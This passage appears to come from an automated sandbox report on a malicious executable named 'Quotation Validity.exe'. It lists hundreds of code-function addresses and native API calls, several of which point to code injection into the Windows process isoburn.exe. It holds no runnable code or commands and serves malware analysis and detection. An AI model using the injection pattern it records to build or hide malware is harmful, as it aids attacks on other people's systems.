                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B2EA0 NtAdjustPrivilegesToken,9_2_013B2EA0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B2E80 NtReadVirtualMemory,9_2_013B2E80
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B2EE0 NtQueueApcThread,9_2_013B2EE0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA35C0 NtCreateMutant,LdrInitializeThunk,12_2_04EA35C0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA4650 NtSuspendThread,LdrInitializeThunk,12_2_04EA4650
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA4340 NtSetContextThread,LdrInitializeThunk,12_2_04EA4340
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA2CA0 NtQueryInformationToken,LdrInitializeThunk,12_2_04EA2CA0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA2C60 NtCreateKey,LdrInitializeThunk,12_2_04EA2C60
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA2C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_04EA2C70
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA2DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_04EA2DF0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA2DD0 NtDelayExecution,LdrInitializeThunk,12_2_04EA2DD0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA2D30 NtUnmapViewOfSection,LdrInitializeThunk,12_2_04EA2D30
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA2D10 NtMapViewOfSection,LdrInitializeThunk,12_2_04EA2D10
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA2EE0 NtQueueApcThread,LdrInitializeThunk,12_2_04EA2EE0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA2E80 NtReadVirtualMemory,LdrInitializeThunk,12_2_04EA2E80
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA2FE0 NtCreateFile,LdrInitializeThunk,12_2_04EA2FE0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA2FB0 NtResumeThread,LdrInitializeThunk,12_2_04EA2FB0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA2F30 NtCreateSection,LdrInitializeThunk,12_2_04EA2F30
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA39B0 NtGetContextThread,LdrInitializeThunk,12_2_04EA39B0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA2AF0 NtWriteFile,LdrInitializeThunk,12_2_04EA2AF0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA2AD0 NtReadFile,LdrInitializeThunk,12_2_04EA2AD0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA2BE0 NtQueryValueKey,LdrInitializeThunk,12_2_04EA2BE0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_04EA2BF0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA2BA0 NtEnumerateValueKey,LdrInitializeThunk,12_2_04EA2BA0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA2B60 NtClose,LdrInitializeThunk,12_2_04EA2B60
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA3090 NtSetValueKey,12_2_04EA3090
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA3010 NtOpenDirectoryObject,12_2_04EA3010
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA2CF0 NtOpenProcess,12_2_04EA2CF0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA2CC0 NtQueryVirtualMemory,12_2_04EA2CC0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA2C00 NtQueryInformationProcess,12_2_04EA2C00
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA2DB0 NtEnumerateKey,12_2_04EA2DB0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA3D70 NtOpenThread,12_2_04EA3D70
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA2D00 NtSetInformationFile,12_2_04EA2D00
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA3D10 NtOpenProcessToken,12_2_04EA3D10
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA2EA0 NtAdjustPrivilegesToken,12_2_04EA2EA0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA2E30 NtWriteVirtualMemory,12_2_04EA2E30
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA2FA0 NtQuerySection,12_2_04EA2FA0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA2F90 NtProtectVirtualMemory,12_2_04EA2F90
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA2F60 NtCreateProcessEx,12_2_04EA2F60
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA2AB0 NtWaitForSingleObject,12_2_04EA2AB0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA2B80 NtQueryInformationFile,12_2_04EA2B80
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A69210 NtReadFile,12_2_02A69210
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A693A0 NtClose,12_2_02A693A0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A69300 NtDeleteFile,12_2_02A69300
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A690A0 NtCreateFile,12_2_02A690A0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A69510 NtAllocateVirtualMemory,12_2_02A69510
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 2_2_018243E82_2_018243E8
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 2_2_0182E0942_2_0182E094
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 2_2_018270512_2_01827051
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 2_2_032D73382_2_032D7338
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 2_2_032D01212_2_032D0121
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 2_2_032D01302_2_032D0130
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 2_2_032DE9C82_2_032DE9C8
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 2_2_032DE9D82_2_032DE9D8
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 2_2_032D732A2_2_032D732A
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 2_2_078A28382_2_078A2838
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 2_2_078A77382_2_078A7738
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 2_2_078A77482_2_078A7748
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 2_2_078A93182_2_078A9318
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 2_2_078A73102_2_078A7310
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 2_2_078AE0C82_2_078AE0C8
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 2_2_078A6ED82_2_078A6ED8
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 2_2_078A7B802_2_078A7B80
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 2_2_078A7B712_2_078A7B71
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 2_2_082E41C42_2_082E41C4
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 2_2_082EF7882_2_082EF788
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 2_2_082EC8302_2_082EC830
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 2_2_082E00402_2_082E0040
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 2_2_082EC8402_2_082EC840
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 2_2_082ECAC72_2_082ECAC7
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 2_2_082E6D312_2_082E6D31
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 2_2_082EF7782_2_082EF778
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_004185839_2_00418583
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_004030409_2_00403040
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_004010009_2_00401000
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0040E1089_2_0040E108
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0040E1139_2_0040E113
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_004012709_2_00401270
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_004022A59_2_004022A5
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_004022B09_2_004022B0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_00402B219_2_00402B21
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_00402B309_2_00402B30
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0040242E9_2_0040242E
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_004024309_2_00402430
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0042ECA39_2_0042ECA3
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0040FDAB9_2_0040FDAB
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0040FDB39_2_0040FDB3
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_004027109_2_00402710
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0040DFC39_2_0040DFC3
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0040FFD39_2_0040FFD3
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_004167939_2_00416793
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014081589_2_01408158
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0144B16B9_2_0144B16B
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013701009_2_01370100
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136F1729_2_0136F172
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B516C9_2_013B516C
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0141A1189_2_0141A118
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0138B1B09_2_0138B1B0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014381CC9_2_014381CC
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014401AA9_2_014401AA
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0142F0CC9_2_0142F0CC
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0143F0E09_2_0143F0E0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014370E99_2_014370E9
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C09_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0143A3529_2_0143A352
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0143132D9_2_0143132D
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136D34C9_2_0136D34C
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014403E69_2_014403E6
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013C739A9_2_013C739A
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0138E3F09_2_0138E3F0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014202749_2_01420274
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013852A09_2_013852A0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014212ED9_2_014212ED
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139B2C09_2_0139B2C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013805359_2_01380535
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014375719_2_01437571
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014405919_2_01440591
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0141D5B09_2_0141D5B0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014324469_2_01432446
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013714609_2_01371460
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0143F43F9_2_0143F43F
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0142E4F69_2_0142E4F6
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013807709_2_01380770
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013A47509_2_013A4750
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013717EC9_2_013717EC
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0143F7B09_2_0143F7B0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137C7C09_2_0137C7C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014316CC9_2_014316CC
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139C6E09_2_0139C6E0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013969629_2_01396962
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013899509_2_01389950
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139B9509_2_0139B950
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013829A09_2_013829A0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0144A9A69_2_0144A9A6
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013ED8009_2_013ED800
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0138A8409_2_0138A840
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013668B89_2_013668B8
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013AE8F09_2_013AE8F0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013838E09_2_013838E0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0143FB769_2_0143FB76
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01436BD79_2_01436BD7
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139FB809_2_0139FB80
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013BDBF99_2_013BDBF9
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F5BF09_2_013F5BF0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01437A469_2_01437A46
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0143FA499_2_0143FA49
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F3A6C9_2_013F3A6C
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0142DAC69_2_0142DAC6
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013C5AA09_2_013C5AA0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137EA809_2_0137EA80
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0141DAAC9_2_0141DAAC
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01431D5A9_2_01431D5A
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01437D739_2_01437D73
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0138AD009_2_0138AD00
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01383D409_2_01383D40
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01398DBF9_2_01398DBF
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137ADE09_2_0137ADE0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139FDC09_2_0139FDC0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F9C329_2_013F9C32
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01380C009_2_01380C00
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01370CF29_2_01370CF2
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01420CB59_2_01420CB5
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013A0F309_2_013A0F30
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013C2F289_2_013C2F28
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0143FF099_2_0143FF09
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F4F409_2_013F4F40
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01381F929_2_01381F92
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0138CFE09_2_0138CFE0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0143FFB19_2_0143FFB1
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01372FC89_2_01372FC8
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01380E599_2_01380E59
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0143EE269_2_0143EE26
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01389EB09_2_01389EB0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0143EEDB9_2_0143EEDB
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01392E909_2_01392E90
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0143CE939_2_0143CE93
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F1E4F612_2_04F1E4F6
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E6146012_2_04E61460
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F2244612_2_04F22446
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F2F43F12_2_04F2F43F
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F0D5B012_2_04F0D5B0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F3059112_2_04F30591
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F2757112_2_04F27571
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E7053512_2_04E70535
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E8C6E012_2_04E8C6E0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F216CC12_2_04F216CC
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E617EC12_2_04E617EC
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E6C7C012_2_04E6C7C0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F2F7B012_2_04F2F7B0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E7077012_2_04E70770
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E9475012_2_04E94750
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F2F0E012_2_04F2F0E0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F270E912_2_04F270E9
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E770C012_2_04E770C0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F1F0CC12_2_04F1F0CC
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F281CC12_2_04F281CC
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E7B1B012_2_04E7B1B0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F301AA12_2_04F301AA
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EA516C12_2_04EA516C
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E5F17212_2_04E5F172
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F3B16B12_2_04F3B16B
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EF815812_2_04EF8158
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E6010012_2_04E60100
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F0A11812_2_04F0A118
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F112ED12_2_04F112ED
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E8B2C012_2_04E8B2C0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EF02C012_2_04EF02C0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E752A012_2_04E752A0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F1027412_2_04F10274
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F303E612_2_04F303E6
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E7E3F012_2_04E7E3F0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EB739A12_2_04EB739A
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F2A35212_2_04F2A352
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E5D34C12_2_04E5D34C
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F2132D12_2_04F2132D
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E60CF212_2_04E60CF2
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F10CB512_2_04F10CB5
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EE9C3212_2_04EE9C32
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E70C0012_2_04E70C00
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E6ADE012_2_04E6ADE0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E8FDC012_2_04E8FDC0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E88DBF12_2_04E88DBF
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F27D7312_2_04F27D73
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E73D4012_2_04E73D40
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F21D5A12_2_04F21D5A
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E7AD0012_2_04E7AD00
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F2EEDB12_2_04F2EEDB
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E79EB012_2_04E79EB0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F2CE9312_2_04F2CE93
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E82E9012_2_04E82E90
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E70E5912_2_04E70E59
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F2EE2612_2_04F2EE26
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E7CFE012_2_04E7CFE0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E62FC812_2_04E62FC8
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F2FFB112_2_04F2FFB1
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EEEFA012_2_04EEEFA0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E71F9212_2_04E71F92
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EE4F4012_2_04EE4F40
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EB2F2812_2_04EB2F28
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E90F3012_2_04E90F30
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F2FF0912_2_04F2FF09
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E738E012_2_04E738E0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E9E8F012_2_04E9E8F0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E568B812_2_04E568B8
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E7A84012_2_04E7A840
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EDD80012_2_04EDD800
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E729A012_2_04E729A0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F3A9A612_2_04F3A9A6
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E8696212_2_04E86962
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E7995012_2_04E79950
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E8B95012_2_04E8B950
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F1DAC612_2_04F1DAC6
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EB5AA012_2_04EB5AA0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F0DAAC12_2_04F0DAAC
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E6EA8012_2_04E6EA80
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EE3A6C12_2_04EE3A6C
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F27A4612_2_04F27A46
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F2FA4912_2_04F2FA49
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EADBF912_2_04EADBF9
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04EE5BF012_2_04EE5BF0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F26BD712_2_04F26BD7
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E8FB8012_2_04E8FB80
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04F2FB7612_2_04F2FB76
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A51C3012_2_02A51C30
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A552C012_2_02A552C0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A534D012_2_02A534D0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A4CAE812_2_02A4CAE8
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A4CAF012_2_02A4CAF0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A6B9E012_2_02A6B9E0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A4AE4512_2_02A4AE45
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A4AE5012_2_02A4AE50
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A4AD0012_2_02A4AD00
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A4CD1012_2_02A4CD10
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04BDE77012_2_04BDE770
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04BDE2B412_2_04BDE2B4
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04BDE3D312_2_04BDE3D3
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04BDD83812_2_04BDD838
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: String function: 0136B970 appears 271 times
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: String function: 013B5130 appears 36 times
